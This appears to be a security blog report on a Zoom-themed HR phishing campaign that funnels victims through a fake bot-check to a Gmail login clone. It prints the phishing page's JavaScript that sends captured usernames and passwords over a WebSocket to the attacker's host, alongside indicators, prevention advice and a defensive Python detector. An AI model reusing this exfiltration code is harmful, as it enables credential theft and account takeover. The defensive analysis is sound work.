A seemingly legitimate Zoom document share from “HR” redirected victims through a fake bot-protection gate into a Gmail login phish. User credentials are exfiltrated live via WebSocket and validated in real time.
This report breaks down the social engineering, the malicious infrastructure, proof-of-concept exfiltration code, and indicators of compromise to watch for.
Job seekers and employees alike trust Zoom notifications for document sharing. In one recent incident, an email titled “HR application” arrived from a valid Zoom Docs address. SPF, DKIM and DMARC all passed inspection, lulling the recipient into a false sense of security.
The link appeared as a standard Zoom document URL, but actually pointed to hxxps://overflow.qyrix[.]com.de/GAR@bBWe/, a server hosting a “Press & Hold to confirm” bot-protection widget.
On deeper inspection I realized the document link led to an offsite page that redirected to a classic Gmail credential harvesting page.


Upon passing the gate, the user was redirected to hxxps://overflow.qyrix[.]com.de/aoi99lxz7s0?id=02efd7fc7…, where a replica of the Gmail login UI awaited credentials. The entire funnel leveraged Zoom’s trusted platform to maximize click-through rates and avoid initial suspicion.
Technical Analysis
The phishing page not only mimicked Gmail’s interface, but also employed a WebSocket connection for real-time data theft.
When credentials are entered, the following snippet establishes a live channel to the attacker’s command-and-control server:
```javascript
// Snippet served by the phishing page, as captured in this analysis:
// once the form is submitted, open a WebSocket to the attacker's host
// and send the harvested fields (username/password are the form inputs).
const ws = new WebSocket('wss://overflow.qyrix.com.de/ws');
ws.onopen = () => {
  const payload = JSON.stringify({ user: username, pass: password });
  ws.send(payload);
  ws.close();
};
```
Captured WebSocket frames confirmed immediate exfiltration of usernames and passwords. On the backend, the credentials are validated against Google's authentication API, which explains the slight latency compared to static phishing pages.
This two-stage validation lets attackers sort valid logins from failures on the fly, accelerating follow-up exploitation or account takeover.
Prevention Strategies
Any Zoom share link pointing to a non-zoom.us domain should be treated as suspicious. The presence of a “Press & Hold” verification or any quiz before login is out of place for Google’s authentication flow.


SOC analysts should monitor for unexpected outbound WebSocket (ws:// or wss://) connections from browsers. In email gateways, URL rewriting and domain reputation checks can flag hxxps://overflow.qyrix.com.de as malicious.
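The two checks above (a Zoom-branded link whose host is not under zoom.us, and a browser WebSocket to a host outside an expected set) as an added defender-side example; this is not code from the article or from the phishing kit. The key=value proxy log lines and the WebSocket allowlist are constructed for the example.

```python
from urllib.parse import urlsplit

# Hosts that legitimately terminate Zoom document links (zoom.us and its subdomains).
ZOOM_HOSTS = ("zoom.us",)
# Constructed allowlist of hosts to which browsers are expected to open WebSockets.
WS_ALLOWLIST = {"zoom.us", "google.com", "slack.com"}


def refang(url: str) -> str:
    """Turn a defanged indicator (hxxps://, [.]) back into a parseable URL."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def host_matches(host: str, allowed) -> bool:
    """True if host equals an allowed domain or is a subdomain of it (lookalikes fail)."""
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in allowed)


def is_suspicious_zoom_link(url: str) -> bool:
    """A link presented as a Zoom document share whose host is not under zoom.us."""
    host = urlsplit(refang(url)).hostname or ""
    return not host_matches(host, ZOOM_HOSTS)


# Constructed proxy log lines (key=value); real products differ, so adapt the parser.
# Seeing the Upgrade header for wss:// traffic needs TLS inspection or browser telemetry.
SAMPLE_LOG = """\
ts=2024-01-01T10:00:00Z src=10.0.0.5 method=GET host=mail.google.com path=/ upgrade=-
ts=2024-01-01T10:00:02Z src=10.0.0.5 method=GET host=overflow.qyrix.com.de path=/ws upgrade=websocket
ts=2024-01-01T10:00:03Z src=10.0.0.7 method=GET host=us02web.zoom.us path=/wc/ws upgrade=websocket
"""


def parse_line(line: str) -> dict:
    return dict(kv.split("=", 1) for kv in line.split())


def find_unexpected_websockets(log_text: str, allowlist=WS_ALLOWLIST) -> list:
    """Return (src, host, path) for every WebSocket upgrade to a host outside the allowlist."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec.get("upgrade", "").lower() != "websocket":
            continue
        if not host_matches(rec.get("host", ""), allowlist):
            hits.append((rec["src"], rec["host"], rec["path"]))
    return hits
```

Run against the constructed log, only the upgrade to overflow.qyrix.com.de is reported; the Zoom web client's own WebSocket is allowlisted because its host is a real zoom.us subdomain.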
If credentials have been submitted, immediate password resets via the official Google site are mandatory, followed by enabling two-factor authentication.
Users should inspect full email headers, verifying that the From domain matches the link domain. Security teams can block the malicious domain at DNS or proxy levels.
Reporting to Zoom’s abuse portal and Google’s phishing report form with screenshots and headers will aid takedown efforts. Encouraging the use of password managers adds another line of defense, as they will refuse to autofill credentials on off-domain pages.
In conclusion, while Zoom’s document-sharing features enhance collaboration, they can be abused as a trusted vector for sophisticated phishing campaigns.
A quick URL sanity check, header inspection, and awareness of unusual verification steps can protect your inbox—and your credentials—from this malicious HR masquerade.